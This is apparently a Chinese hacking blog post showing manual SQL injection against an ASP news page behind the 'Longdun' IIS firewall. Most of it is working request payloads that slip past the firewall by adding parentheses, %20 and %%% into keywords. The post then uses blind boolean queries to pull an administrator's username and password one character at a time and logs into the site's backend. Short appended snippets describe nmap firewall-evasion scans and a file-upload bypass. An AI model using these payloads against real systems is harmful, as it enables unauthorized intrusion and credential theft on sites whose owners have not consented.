今天的技術主要是結合網上的和自己的想法思路繞過」龍盾iis防火牆「其他防火牆沒試過
好的廢話不多說實戰開始,
手工注入,工具是不行啦,
第一咱先判斷是否有注入點
/newsshow.asp?articleid=120 』
/newsshow.asp?articleid=120 and 1=1
/newsshow.asp?articleid=120 and 1=2
一直提示 「龍盾iis防火牆」提示:請不要提交非法資訊或惡意訪問
我想這個大家應該都不陌生,現在國內用這個的防火牆還挺多的,我看網上資料也比較少呵呵
自己研究了一下
成功突破~
/newsshow.asp?articleid=(120)%20and%20(%201=1%20) 返回正常
/newsshow.asp?articleid=(120)%20and%20(%201=2%20) 返回錯誤
呵呵,看來已經成功突破防火牆的限制啦~哈哈~
繼續踩解吧~
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct * from admin)
呵呵返回成功,存在admin表,應該是個access的~是乙個公司**,估計也是access的呵呵
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct username from admin)
呵呵返回成功,存在username表
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct password from admin)
呵呵返回成功,存在password表
繼續往下踩解吧~走吧,
/newsshow.asp?articleid=(120) order by 1
/newsshow.asp?articleid=(120) order by 1 order by 1
一直返回錯誤 看來 order 是用不了了,沒辦法 只有乙個乙個的去踩解啦~
先看看管理員使用者名稱有幾位吧~
/newsshow.asp?articleid=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5)
一切正常呵呵,不錯 rp挺好~
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109)
賬號都出來了, 用計算器轉化了下
帳號就是:x2c3m
後面猜解密碼~~
/newsshow.asp?articleid=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8) 密碼一共有8位數
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97)
/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100)
密碼:b***ad
直接去後台登陸,成功搞定
from:小 馬'blog
nmap繞過防火牆
1.發現防火牆 1 nmap sa 如果結果是filtered,那麼應該就是有防火牆 2 nmap badsum 事實上,所有主機都會丟棄錯誤checksum的資料報。如果收到響應,那麼可能是那些沒有檢查資料報的防火牆或ips。2.繞過防火牆 1 nmap ff 2 nmap f script fi...
Nmap繞過防火牆
1.碎片化 nmap傳送8個位元組的資料報繞過防火牆 ids ips。在防火牆配置不當的時候有用。nmap f host mtu,最大傳輸單元,它是碎片化的別名,我們可以指定它的大小 8的倍數 2.誘餌這種型別的掃瞄是非常隱蔽且無法察覺。目標由多個假冒或偽造ip位址進行掃瞄。這樣防火牆就會認為攻擊或...
ashx繞過防火牆
2.比較笨的方法,看 吧 我對 進行測試使用,防火牆依然檢查aspx字尾,pnig0s的 是上傳xx.jpg儲存的也是xx.jpg,xx.txt也是xx.txt,我的方法是做了乙個小的修改,偽原創。而且客戶端不用那麼麻煩。上傳任何型別檔案 防火牆不檢查的字尾 都會在服務端自動重新命名.看 吧 服務端...